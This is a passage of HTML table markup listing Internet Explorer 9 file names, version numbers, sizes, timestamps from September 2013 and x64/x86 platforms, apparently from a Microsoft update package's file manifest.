class=\"sbody-td\">96,768</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,392,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:12</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">86,528</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">887,808</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:38</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">887,808</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:15</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">729,088</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:19</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">729,088</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:32</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">96,768</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:16</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">96,768</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,012</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:52</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">17,833,984</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:43</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:15</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,012</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">17,835,008</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:00</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">548,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:28</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">548,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">305,152</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">305,152</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:08</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">173,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:23</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">05:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">173,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:07</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">05-Mar-2011</td><td class=\"sbody-td\">11:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">499,200</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">499,200</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:14</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,147,840</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:19</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">182,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:48</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,147,840</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:04</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">182,936</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:05</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">996,352</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:29</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">996,352</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:09</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">237,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:30</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">237,056</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:10</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">10,926,080</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:01</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">20,842</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:52</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">248,320</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:07</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">10,926,592</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:26</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">20,842</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">15:08</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">248,320</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">13:59</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">141,312</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:37</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdebuggeride.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">141,312</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:14</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">816,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,312,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:42</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">816,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:07</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,334,720</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:22</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">599,040</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:21</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">599,040</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">14:06</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">757,400</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:05</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">08:55</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">607,744</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:20</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,518</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">73,216</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">12,336,128</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,012</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:07</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">12,336,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">2,382,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:18</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_microsoft-windows-ie-htmlrendering.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">2,012</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">142,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">09:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">20,842</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:07</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">9,739,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:38</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">176,640</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wow64_ieframe.ptxml</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">20,842</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:23</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,800,704</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">717,824</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jscript9.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,806,848</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:37</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.17014</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:06</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vbscript.dll</td><td class=\"sbody-td\">5.8.7601.20625</td><td class=\"sbody-td\">420,864</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:21</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,427,968</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:28</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">65,024</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:09</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,129,472</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:13</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">75,264</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,130,496</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">66,048</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">678,912</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:31</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">194,560</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:30</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:03</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">10:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">9.0.8112.20625</td><td class=\"sbody-td\">1,796,096</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">11:19</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6000.16386</td><td class=\"sbody-td\">149,656</td><td class=\"sbody-td\">22-Sep-2013</td><td class=\"sbody-td\">12:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">9.0.8112.16514</td><td 